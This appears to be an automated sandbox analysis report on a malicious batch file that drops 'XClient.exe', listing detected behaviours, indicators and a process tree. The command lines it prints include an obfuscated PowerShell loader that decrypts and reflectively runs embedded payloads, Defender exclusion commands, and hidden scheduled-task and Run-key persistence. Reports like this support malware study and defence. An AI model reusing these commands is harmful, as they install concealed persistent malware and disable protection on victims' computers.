Analysis

max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29/05/2024, 13:50

Static task: static1

Behavioral task: behavioral1
  Sample: 44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat
  Resource: win7-20240215-en

Behavioral task: behavioral2
  Sample: 44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat
  Resource: win10v2004-20240426-en
General

Target: 44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat
Size: 330KB
MD5: 54c448c9e570016b04f3f297447b3504
SHA1: 6e0470f78a958153b513301505ff9379a2a625a0
SHA256: 44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e
SHA512: a5bd205f446a3a04fe753a58983c8df7a468c9b90966c07339f1eb8d36b3ced1975660e102b15fc83b65e3794c8ffb6d40ff74f8a94c1ae8e33ffa0b4599fad6
SSDEEP: 6144:qjP2m4Zg7LMk5EB11YdkawH8vlP+JamAtdQbCEk+ajFbkDUJEc+cEPMPonbK0v/b:qSm6g7LL6L/1HklP+szy+Fbkk5xwMAn7
Malware Config
Signatures

Blocklisted process makes network request (7 IoCs)
  flow  pid   Process
  13    1988  powershell.exe
  22    1988  powershell.exe
  37    1988  powershell.exe
  40    1988  powershell.exe
  48    1988  powershell.exe
  49    1988  powershell.exe
  51    1988  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
  Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid   Process
  5036  powershell.exe
  1728  powershell.exe
  5008  powershell.exe
  1800  powershell.exe
  2456  powershell.exe
  4440  powershell.exe
  1988  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation (WScript.exe)

Executes dropped EXE (1 IoC)
  pid   Process
  3040  XClient.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\ProgramData\\XClient.exe" (powershell.exe)

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  11    ip-api.com

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  764   schtasks.exe

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings (powershell.exe)

Suspicious behavior: EnumeratesProcesses (17 IoCs)
  pid   Process
  2456  powershell.exe (2 entries)
  4440  powershell.exe (2 entries)
  1988  powershell.exe (2 entries)
  5036  powershell.exe (2 entries)
  1728  powershell.exe (2 entries)
  5008  powershell.exe (2 entries)
  1800  powershell.exe (2 entries)
  1988  powershell.exe
  3040  XClient.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token: SeDebugPrivilege  pid 2456  powershell.exe
  Token: SeDebugPrivilege  pid 4440  powershell.exe
  pid 4440 powershell.exe then adjusts the following 21 tokens, in this order, over three passes (the listing ends at Token 35 of the third pass):
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of SetWindowsHookEx (1 IoC)
  pid   Process
  1988  powershell.exe

Suspicious use of WriteProcessMemory (20 IoCs; each row below is recorded twice in the report)
  description                          pid   Process         procid_target
  PID 2912 wrote to memory of 2456     2912  cmd.exe         86
  PID 2456 wrote to memory of 4440     2456  powershell.exe  88
  PID 2456 wrote to memory of 4776     2456  powershell.exe  90
  PID 4776 wrote to memory of 364      4776  WScript.exe     91
  PID 364 wrote to memory of 1988      364   cmd.exe         93
  PID 1988 wrote to memory of 5036     1988  powershell.exe  94
  PID 1988 wrote to memory of 1728     1988  powershell.exe  96
  PID 1988 wrote to memory of 5008     1988  powershell.exe  98
  PID 1988 wrote to memory of 1800     1988  powershell.exe  100
  PID 1988 wrote to memory of 764      1988  powershell.exe  104

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(indentation and the bracketed number give the depth in the process tree)

[1] C:\Windows\system32\cmd.exe (PID 2912)
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat"
    Signatures: Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2456)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('as5c4IKZBGAmU1MTJQmpbySOtylqsc8fmQAXEiLJEX4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ikgpE1TVZfyQiJXiGT8UmQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zwmaY=New-Object System.IO.MemoryStream(,$param_var); $AOOts=New-Object System.IO.MemoryStream; $lNIen=New-Object System.IO.Compression.GZipStream($zwmaY, [IO.Compression.CompressionMode]::Decompress); $lNIen.CopyTo($AOOts); $lNIen.Dispose(); $zwmaY.Dispose(); $AOOts.Dispose(); $AOOts.ToArray();}function execute_function($param_var,$param2_var){ $XobNX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bHvvl=$XobNX.EntryPoint; $bHvvl.Invoke($null, $param2_var);}$pPSNx = 'C:\Users\Admin\AppData\Local\Temp\44baa120c32e2bbe83d9c1b1f8b2cc269e1e18c53efd08a648bf068ccef3153e.bat';$host.UI.RawUI.WindowTitle = $pPSNx;$MNJUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pPSNx).Split([Environment]::NewLine);foreach ($NMxlJ in $MNJUA) { if ($NMxlJ.StartsWith(':: ')) { $QHzcy=$NMxlJ.Substring(3); break; }}$payloads_var=[string[]]$QHzcy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      Signatures: Command and Scripting Interpreter: PowerShell; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4440)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_756_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_756.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WScript.exe (PID 4776)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_756.vbs"
        Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe (PID 364)
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_756.bat" "
          Signatures: Suspicious use of WriteProcessMemory

        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1988)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('as5c4IKZBGAmU1MTJQmpbySOtylqsc8fmQAXEiLJEX4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ikgpE1TVZfyQiJXiGT8UmQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zwmaY=New-Object System.IO.MemoryStream(,$param_var); $AOOts=New-Object System.IO.MemoryStream; $lNIen=New-Object System.IO.Compression.GZipStream($zwmaY, [IO.Compression.CompressionMode]::Decompress); $lNIen.CopyTo($AOOts); $lNIen.Dispose(); $zwmaY.Dispose(); $AOOts.Dispose(); $AOOts.ToArray();}function execute_function($param_var,$param2_var){ $XobNX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bHvvl=$XobNX.EntryPoint; $bHvvl.Invoke($null, $param2_var);}$pPSNx = 'C:\Users\Admin\AppData\Roaming\startup_str_756.bat';$host.UI.RawUI.WindowTitle = $pPSNx;$MNJUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($pPSNx).Split([Environment]::NewLine);foreach ($NMxlJ in $MNJUA) { if ($NMxlJ.StartsWith(':: ')) { $QHzcy=$NMxlJ.Substring(3); break; }}$payloads_var=[string[]]$QHzcy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory

          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5036)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses

          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1728)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses

          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5008)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
              Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses

          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1800)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
              Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses

          [6] C:\Windows\System32\schtasks.exe (PID 764)
              Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\ProgramData\XClient.exe"
              Signatures: Creates scheduled task(s)

[1] C:\ProgramData\XClient.exe (PID 3040)
    Command line: C:\ProgramData\XClient.exe
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads